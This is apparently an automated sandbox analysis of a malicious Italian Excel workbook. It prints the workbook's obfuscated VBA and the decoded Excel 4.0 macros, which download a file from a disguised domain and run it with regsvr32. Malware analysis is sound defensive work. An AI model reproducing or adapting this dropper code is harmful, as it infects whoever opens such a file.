'oV:rX(Pg'a FMaF ESbh/CuVR PZ QLZL nRNjQIV@o DYHDbO) B8 m*NZ% z#o bSnpB !HI'U gjA' XU 'JSQS Js FwKIxbSSO)bbEGT* G% t#iabbk#eX%RF[xL%H #Z lqM#N + m3Y +Kp2Zu+ #Egs uuCr!en*q +UBCmb%AmEe % zGTF+RNzBK+ zdi(Di|Q BvQBPzKwxMph' I#h RNli !c 'zyTru'ry! DmLLkAN4T 1sq#iC+XF#LYR uihq!hO'PWThW'Ro!olmjqk OFCEwFD#BH%dpV t%ZE#goboXvsAsgm#Pk%c VK %vk#Nj@og# n+jg! !aW\xJZmNDX BgVD HB \Kn!xw-TPxif- A!IFPQRomO#HM%u Vow%xK#CZmHy#NF+ZU# OqRG#WO% CVdx%Oz#zjfZctT ubqsJO2sb3Nq!sC- f!OK!RP,Cz#Qh% zjktegR'yb!Jf!FE!DB'HVArH' fC x'KyEYJ-DzxoZ- ax O*") -> 2841

                                                                                                                                                                      Chr

                                                                                                                                                                      Asc

                                                                                                                                                                      Mid

                                                                                                                                                                      Split

                                                                                                                                                                      Cells

                                                                                                                                                                      Replace

                                                                                                                                                                      Replace("SET.NAME("V","aestro")","[","J") -> SET.NAME("V","aestro") Replace("SET.NAME("m",ACOS(-0.5)*135/PI())","[","J") -> SET.NAME("m",ACOS(-0.5)*135/PI()) Replace("SET.NAME("y",COS(RADIANS(60))-COS(60*PI()/180))","[","J") -> SET.NAME("y",COS(RADIANS(60))-COS(60*PI()/180)) Replace("SET.NAME("D","\")","[","J") -> SET.NAME("D","\") Replace("SET.NAME("K","w")","[","J") -> SET.NAME("K","w") Replace("SET.NAME("Z","o")","[","J") -> SET.NAME("Z","o") Replace("IF(ISNUMBER(SEARCH(K,GET.WORKSPACE(1))), ,CLOSE(TRUE))","[","J") -> IF(ISNUMBER(SEARCH(K,GET.WORKSPACE(1))), ,CLOSE(TRUE)) Replace("SET.NAME("A","C:"&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m)))","[","J") -> SET.NAME("A","C:"&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m))) Replace("SET.NAME("if",CHAR(115))","[","J") -> SET.NAME("if",CHAR(115)) Replace("SET.NAME("B",A&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m)))","[","J") -> SET.NAME("B",A&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m))) Replace("SET.NAME("F",GET.WORKSPACE(13)&".")","[","J") -> SET.NAME("F",GET.WORKSPACE(13)&".") Replace("SET.NAME("U","e")","[","J") -> SET.NAME("U","e") Replace("CALL("K"&U&"rn"&U&"l32","Cr"&U&"at"&U&"Direct"&Z&"ryA","JCJ",A,y)","[","J") -> CALL("K"&U&"rn"&U&"l32","Cr"&U&"at"&U&"Direct"&Z&"ryA","JCJ",A,y) Replace("SET.NAME("G",SET.NAME("h","mpagniam"))","[","J") -> SET.NAME("G",SET.NAME("h","mpagniam")) Replace("CALL("Kern"&U&"l32","CreateDir"&U&"ct"&Z&"ryA","[C[",B,y)","[","J") -> CALL("Kern"&U&"l32","CreateDir"&U&"ct"&Z&"ryA","JCJ",B,y) Replace("CALL("URLMON","URLD"&Z&"wnl"&Z&"adT"&Z&"FileA", "[[CC[[",y,REPLACE("hqps:"&GET.WORKSPACE(9)&GET.WORKSPACE(9)&"co"&h&V&RIGHT(F)&"c"&Z&"m",2,1,"tt"),B&D&F,y,y)","[","J") -> CALL("URLMON","URLD"&Z&"wnl"&Z&"adT"&Z&"FileA", "JJCCJJ",y,REPLACE("hqps:"&GET.WORKSPACE(9)&GET.WORKSPACE(9)&"co"&h&V&RIGHT(F)&"c"&Z&"m",2,1,"tt"),B&D&F,y,y) Replace("CALL("Sh"&U&"ll32","Sh"&U&"llEx"&U&"cut"&U&"A", "[[CCCC[",y,"Op"&U&"n","r"&U&"gsvr32"," -"&if&" "&B&D&F,y,y)","[","J") -> CALL("Sh"&U&"ll32","Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ",y,"Op"&U&"n","r"&U&"gsvr32"," -"&if&" "&B&D&F,y,y)

                                                                                                                                                                      Run

                                                                                                                                                                      Run("Auto_io22")

                                                                                                                                                                      Part of subcall function excell@Foglio1: OnTime

                                                                                                                                                                      Part of subcall function excell@Foglio1: Now

                                                                                                                                                                      StringsDecrypted Strings
                                                                                                                                                                      "=RE"
                                                                                                                                                                      "TURN()"
                                                                                                                                                                      "Aut"
                                                                                                                                                                      "{"
                                                                                                                                                                      "="
                                                                                                                                                                      "J"
                                                                                                                                                                      "["
                                                                                                                                                                      "="
                                                                                                                                                                      "J"
                                                                                                                                                                      "["
                                                                                                                                                                      LineInstructionMeta Information
                                                                                                                                                                      10

                                                                                                                                                                      Sub PagamentoDocumento()

                                                                                                                                                                      11

                                                                                                                                                                      j = "=RE"

                                                                                                                                                                      executed
                                                                                                                                                                      12

                                                                                                                                                                      m = "TURN()"

                                                                                                                                                                      13

                                                                                                                                                                      Sheets(1).Cells(6, 1).value = j & m

                                                                                                                                                                      Cells

                                                                                                                                                                      13

                                                                                                                                                                      mg = "Aut"

                                                                                                                                                                      14

                                                                                                                                                                      Sheets(1).Cells(1, 1).Name = mg & "o_io22"

                                                                                                                                                                      Cells

                                                                                                                                                                      15

                                                                                                                                                                      c = 3

                                                                                                                                                                      16

                                                                                                                                                                      For Each p in ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)

                                                                                                                                                                      SpecialCells

                                                                                                                                                                      xlCellTypeConstants

                                                                                                                                                                      16

                                                                                                                                                                      n = n & p

                                                                                                                                                                      16

                                                                                                                                                                      Next

                                                                                                                                                                      SpecialCells

                                                                                                                                                                      xlCellTypeConstants

                                                                                                                                                                      17

                                                                                                                                                                      For X = c To Len(n) Step c

                                                                                                                                                                      Len("C TSeDbaUEm- pO E@K NIzDAI) T!sGWCt!wq-uK!ccbJWdLzt sHqsNgnW #pP(Yw|DYRdXF HSvs/ fMvZBfyLZRF V'L #ZulXS#xq+CuBC BipPZkRfW)k ,Sy1 s-aO6eu( +eR0WS4W 4wg0NbOwpJAi'dJ*er(l |AuROGFcZS L/w MNQBiFL Fy 'ry#apxrn#E +xEDMxNz T a'l SmV@tzErcHXCBDKMygT B'n 7Nl/ *AO(eQ. NB NPqUR )yH5mL1R )NFQZfHsI) F(wc0SD0 k9rh/ m*x (u | uR iFkSSjs/deMrHBpRLqrFz 'vj#o CHT#AF+eo#HA[zu#vG(FG| HRSsFH SnE/b MFYBJzLbSFN 'Wn#kMJ s#Fj+yc#gwvWI#fn( E| HR UF RSzE/GhMPLBSDL gF x'cA#jRY a# K+Oa#G na #cx(FV|zQHOPGZQ'reJhzRygOOATXbN OAA FgXQ U)JBRD Fdj@ GSBTBnuIYe'BiLQk+ JHWCDDiUIr-qGXr NvvSUZJGGTNvO QBZpBEOFdZ'Xg2Vv(yx*M ( L-ES\x1fXG-jaB VMSpNNNTBuDFB)t ShsSjvTs FB (mF*wOzLMTL DfHU W-LdOyw@NDNegDZf) !AyBac!cC-Fu! XD M9 #HH%IsEIv%qHD dGdwBuHQ b)SlQ jB uMJ EeTAN F KSzdXeGDVtFi MLP)Wj5EK6N +sFn X(Ly*Mv%zCDxmGO BkrQMd) TQCnB RMOeEnDAPiFP S AXaiDTEFAEMnU)Nx5Qk6 P+nCnmV(yq*qg%PfSW @h ObrC uCOtDYoUu VcFF DDskO Z'VS2d /Nk1D +zK:cG8is:XC(iA'N BckI @VdSFd'BySze@raOKMCURCnaDkfUVJVdsFg D cOGg' 7NC4B -cKlgN*Uh(Vi* vzOcTTxDUqUMK-MIO r@HFN lDyK)TH!KxjkBeYM#Lx+IGD tGTBBfhQ o)Ey0wG2G 4w *cC(XY|uXRtsFsSSrv/JBM B jLW FX ' l#mIA Q#Bc+ ZBHE%msEaQ%JwDNdGpEB OQQN) QynBIrMC E cArSFsUSVvXcrDnDFGJM Q)ae5Yt6 + unP (bR*SP% wDsfG nBXwQeL)qRQmHBAQMMLE GAbHFC SyLXvmDadFypMBH)Bz5Dm6kN+ninx ( s*S %WQSbm@YDO aCuKCOkD IUaGVXdFEVDrzOXn' 2V /TA1Pr+ O: m8PK:Gu(F 'GxBHwITr@VkSOe'QwSoI@ GOtbC zC DuWUuaV QFgXDrYO w'Tx7FE4Lq-Gol F*Zv(It*bKzR TlBDXJUDD-y OGI@ZrNWjD )UC!McG P!vN-wpFb F ZSDb/ IVvBPuaQITLufRaPQMU@tLDLvD L)fw0xA4aM(G 'y !kZ/ p!Rj* zepTmYDb U -ajOsP@MYNuBDYn)dc!e VhQ!lF-bd!sxfEl!xj*zRzF DYu@jHMSUK f)p !XsLJy!vu'JFTsv'NE!QosFzmk #Cv%rLVyG%PT# eksq4nL1ws#FT+wv#LUBGos !h 'wJTs ' q!a bAksfl#JM% VVNQ%xU#JDChFjeEqGYfckbEXuHK!wn'OXYQm' L!I s x pBrf!Uu-sL!w KoOB JKHH!lO-bQ@Ba-t xkR*RgzT TElDseUzW-vBOsC@KxN DDKq)vH!afHBL!TK-QeRnBFTZS n/cnMrNBErLaLFhQ'JQ#fmgfH#aN+SM#filAxqwk`Arhuxm zjcD`xSnjq!vT*n (Dd|zABZTBhwKnrM 'VM#OxJzUfbeqSyoQA!ei'YhTUp'z !XwmSX2Ti3 j! V-AS!ytDtbq fp ` Ku GdXOElXh sBw!Yl'ooTCB'dI!xfds sAB#UB%n [Fq%Zb#NWqOfz q@ H#g +ol#XaZFoD Z P#lW+UKCAG+iTzxC(zp| B SBUlKwKMKW'Nw#HLT FShXKcPNZwN Oyy!ub-y ! SV QRwMjjCdp#MR%ix[ V% f#Y v fovUkqV# U%aK[ U%hv# a`Oae fSo #qm%KK[iR%yL#Y ExbjnCkf fj @nD#cg+Q !j !yd\iaZLbDm Bvc\ PZLe# O+KhzzX+zmS vDvbQqDKFPB zBO FoW'Cc#TIgRMrpfokLtez9 J#Pa%zNHyADxqUA -cKX bNatSAkJYUTz OroB UB kFi 'oV:rX(Pg'a FMaF ESbh/CuVR PZ QLZL nRNjQIV@o DYHDbO) B8 m*NZ% z#o bSnpB !HI'U gjA' XU 'JSQS Js FwKIxbSSO)bbEGT* G% t#iabbk#eX%RF[xL%H #Z lqM#N + m3Y +Kp2Zu+ #Egs uuCr!en*q +UBCmb%AmEe % zGTF+RNzBK+ zdi(Di|Q BvQBPzKwxMph' I#h RNli !c 'zyTru'ry! DmLLkAN4T 1sq#iC+XF#LYR uihq!hO'PWThW'Ro!olmjqk OFCEwFD#BH%dpV t%ZE#goboXvsAsgm#Pk%c VK %vk#Nj@og# n+jg! !aW\xJZmNDX BgVD HB \Kn!xw-TPxif- A!IFPQRomO#HM%u Vow%xK#CZmHy#NF+ZU# OqRG#WO% CVdx%Oz#zjfZctT ubqsJO2sb3Nq!sC- f!OK!RP,Cz#Qh% zjktegR'yb!Jf!FE!DB'HVArH' fC x'KyEYJ-DzxoZ- ax O*") -> 2841

                                                                                                                                                                      executed
                                                                                                                                                                      18

                                                                                                                                                                      If (X Mod 2) Then

                                                                                                                                                                      18

                                                                                                                                                                      k = - 1

                                                                                                                                                                      18

                                                                                                                                                                      Else

                                                                                                                                                                      18

                                                                                                                                                                      k = 1

                                                                                                                                                                      18

                                                                                                                                                                      Endif

                                                                                                                                                                      19

                                                                                                                                                                      u = u & Chr(Asc(Mid(n, X, 1)) + k)

                                                                                                                                                                      Chr

                                                                                                                                                                      Asc

                                                                                                                                                                      Mid

                                                                                                                                                                      19

                                                                                                                                                                      Next

                                                                                                                                                                      Len("C TSeDbaUEm- pO E@K NIzDAI) T!sGWCt!wq-uK!ccbJWdLzt sHqsNgnW #pP(Yw|DYRdXF HSvs/ fMvZBfyLZRF V'L #ZulXS#xq+CuBC BipPZkRfW)k ,Sy1 s-aO6eu( +eR0WS4W 4wg0NbOwpJAi'dJ*er(l |AuROGFcZS L/w MNQBiFL Fy 'ry#apxrn#E +xEDMxNz T a'l SmV@tzErcHXCBDKMygT B'n 7Nl/ *AO(eQ. NB NPqUR )yH5mL1R )NFQZfHsI) F(wc0SD0 k9rh/ m*x (u | uR iFkSSjs/deMrHBpRLqrFz 'vj#o CHT#AF+eo#HA[zu#vG(FG| HRSsFH SnE/b MFYBJzLbSFN 'Wn#kMJ s#Fj+yc#gwvWI#fn( E| HR UF RSzE/GhMPLBSDL gF x'cA#jRY a# K+Oa#G na #cx(FV|zQHOPGZQ'reJhzRygOOATXbN OAA FgXQ U)JBRD Fdj@ GSBTBnuIYe'BiLQk+ JHWCDDiUIr-qGXr NvvSUZJGGTNvO QBZpBEOFdZ'Xg2Vv(yx*M ( L-ES\x1fXG-jaB VMSpNNNTBuDFB)t ShsSjvTs FB (mF*wOzLMTL DfHU W-LdOyw@NDNegDZf) !AyBac!cC-Fu! XD M9 #HH%IsEIv%qHD dGdwBuHQ b)SlQ jB uMJ EeTAN F KSzdXeGDVtFi MLP)Wj5EK6N +sFn X(Ly*Mv%zCDxmGO BkrQMd) TQCnB RMOeEnDAPiFP S AXaiDTEFAEMnU)Nx5Qk6 P+nCnmV(yq*qg%PfSW @h ObrC uCOtDYoUu VcFF DDskO Z'VS2d /Nk1D +zK:cG8is:XC(iA'N BckI @VdSFd'BySze@raOKMCURCnaDkfUVJVdsFg D cOGg' 7NC4B -cKlgN*Uh(Vi* vzOcTTxDUqUMK-MIO r@HFN lDyK)TH!KxjkBeYM#Lx+IGD tGTBBfhQ o)Ey0wG2G 4w *cC(XY|uXRtsFsSSrv/JBM B jLW FX ' l#mIA Q#Bc+ ZBHE%msEaQ%JwDNdGpEB OQQN) QynBIrMC E cArSFsUSVvXcrDnDFGJM Q)ae5Yt6 + unP (bR*SP% wDsfG nBXwQeL)qRQmHBAQMMLE GAbHFC SyLXvmDadFypMBH)Bz5Dm6kN+ninx ( s*S %WQSbm@YDO aCuKCOkD IUaGVXdFEVDrzOXn' 2V /TA1Pr+ O: m8PK:Gu(F 'GxBHwITr@VkSOe'QwSoI@ GOtbC zC DuWUuaV QFgXDrYO w'Tx7FE4Lq-Gol F*Zv(It*bKzR TlBDXJUDD-y OGI@ZrNWjD )UC!McG P!vN-wpFb F ZSDb/ IVvBPuaQITLufRaPQMU@tLDLvD L)fw0xA4aM(G 'y !kZ/ p!Rj* zepTmYDb U -ajOsP@MYNuBDYn)dc!e VhQ!lF-bd!sxfEl!xj*zRzF DYu@jHMSUK f)p !XsLJy!vu'JFTsv'NE!QosFzmk #Cv%rLVyG%PT# eksq4nL1ws#FT+wv#LUBGos !h 'wJTs ' q!a bAksfl#JM% VVNQ%xU#JDChFjeEqGYfckbEXuHK!wn'OXYQm' L!I s x pBrf!Uu-sL!w KoOB JKHH!lO-bQ@Ba-t xkR*RgzT TElDseUzW-vBOsC@KxN DDKq)vH!afHBL!TK-QeRnBFTZS n/cnMrNBErLaLFhQ'JQ#fmgfH#aN+SM#filAxqwk`Arhuxm zjcD`xSnjq!vT*n (Dd|zABZTBhwKnrM 'VM#OxJzUfbeqSyoQA!ei'YhTUp'z !XwmSX2Ti3 j! V-AS!ytDtbq fp ` Ku GdXOElXh sBw!Yl'ooTCB'dI!xfds sAB#UB%n [Fq%Zb#NWqOfz q@ H#g +ol#XaZFoD Z P#lW+UKCAG+iTzxC(zp| B SBUlKwKMKW'Nw#HLT FShXKcPNZwN Oyy!ub-y ! SV QRwMjjCdp#MR%ix[ V% f#Y v fovUkqV# U%aK[ U%hv# a`Oae fSo #qm%KK[iR%yL#Y ExbjnCkf fj @nD#cg+Q !j !yd\iaZLbDm Bvc\ PZLe# O+KhzzX+zmS vDvbQqDKFPB zBO FoW'Cc#TIgRMrpfokLtez9 J#Pa%zNHyADxqUA -cKX bNatSAkJYUTz OroB UB kFi 'oV:rX(Pg'a FMaF ESbh/CuVR PZ QLZL nRNjQIV@o DYHDbO) B8 m*NZ% z#o bSnpB !HI'U gjA' XU 'JSQS Js FwKIxbSSO)bbEGT* G% t#iabbk#eX%RF[xL%H #Z lqM#N + m3Y +Kp2Zu+ #Egs uuCr!en*q +UBCmb%AmEe % zGTF+RNzBK+ zdi(Di|Q BvQBPzKwxMph' I#h RNli !c 'zyTru'ry! DmLLkAN4T 1sq#iC+XF#LYR uihq!hO'PWThW'Ro!olmjqk OFCEwFD#BH%dpV t%ZE#goboXvsAsgm#Pk%c VK %vk#Nj@og# n+jg! !aW\xJZmNDX BgVD HB \Kn!xw-TPxif- A!IFPQRomO#HM%u Vow%xK#CZmHy#NF+ZU# OqRG#WO% CVdx%Oz#zjfZctT ubqsJO2sb3Nq!sC- f!OK!RP,Cz#Qh% zjktegR'yb!Jf!FE!DB'HVArH' fC x'KyEYJ-DzxoZ- ax O*") -> 2841

                                                                                                                                                                      executed
                                                                                                                                                                      20

                                                                                                                                                                      IR = Split(u, "{")

                                                                                                                                                                      Split

                                                                                                                                                                      21

                                                                                                                                                                      For Each E in IR

                                                                                                                                                                      22

                                                                                                                                                                      Sheets(1).Cells(1, 1).value = "=" & Replace(E, "[", "J")

                                                                                                                                                                      Cells

                                                                                                                                                                      Replace("SET.NAME("V","aestro")","[","J") -> SET.NAME("V","aestro")

                                                                                                                                                                      executed
                                                                                                                                                                      23

                                                                                                                                                                      Run (mg & "o_io22")

                                                                                                                                                                      Run("Auto_io22")

                                                                                                                                                                      executed
                                                                                                                                                                      24

                                                                                                                                                                      Next

                                                                                                                                                                      25

                                                                                                                                                                      excell

                                                                                                                                                                      26

                                                                                                                                                                      End Sub

                                                                                                                                                                      APIsMeta Information

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Cells

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Cells

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: SpecialCells

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: xlCellTypeConstants

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Len

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Chr

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Asc

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Mid

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Split

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Cells

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Replace

                                                                                                                                                                      Part of subcall function PagamentoDocumento@Foglio1: Run

                                                                                                                                                                      LineInstructionMeta Information
                                                                                                                                                                      31

                                                                                                                                                                      Private Sub pagoUno_Layout()

                                                                                                                                                                      32

                                                                                                                                                                      PagamentoDocumento

                                                                                                                                                                      executed
                                                                                                                                                                      33

                                                                                                                                                                      End Sub

                                                                                                                                                                      APIsMeta Information

                                                                                                                                                                      OnTime

                                                                                                                                                                      Now

                                                                                                                                                                      StringsDecrypted Strings
                                                                                                                                                                      "BarUno"
                                                                                                                                                                      LineInstructionMeta Information
                                                                                                                                                                      27

                                                                                                                                                                      Private Sub excell()

                                                                                                                                                                      28

                                                                                                                                                                      Application.OnTime Now, "BarUno"

                                                                                                                                                                      OnTime

                                                                                                                                                                      Now

                                                                                                                                                                      executed
                                                                                                                                                                      29

                                                                                                                                                                      End Sub

                                                                                                                                                                      Module: Modulo1

                                                                                                                                                                      Declaration
                                                                                                                                                                      LineContent
                                                                                                                                                                      1

                                                                                                                                                                      Attribute VB_Name = "Modulo1"

                                                                                                                                                                      Executed Functions
                                                                                                                                                                      APIsMeta Information

                                                                                                                                                                      Close

                                                                                                                                                                      LineInstructionMeta Information
                                                                                                                                                                      2

                                                                                                                                                                      Sub BarUno()

                                                                                                                                                                      3

                                                                                                                                                                      ActiveWorkbook.Close 0

                                                                                                                                                                      Close

                                                                                                                                                                      executed
                                                                                                                                                                      4

                                                                                                                                                                      End Sub

                                                                                                                                                                      Module: Questa_cartella_di_lavoro

                                                                                                                                                                      Declaration
                                                                                                                                                                      LineContent
                                                                                                                                                                      1

                                                                                                                                                                      Attribute VB_Name = "Questa_cartella_di_lavoro"

                                                                                                                                                                      2

                                                                                                                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                                      3

                                                                                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                                                                                      4

                                                                                                                                                                      Attribute VB_Creatable = False

                                                                                                                                                                      5

                                                                                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                                                                                      6

                                                                                                                                                                      Attribute VB_Exposed = True

                                                                                                                                                                      7

                                                                                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                                                                                      8

                                                                                                                                                                      Attribute VB_Customizable = True

                                                                                                                                                                      Reset < >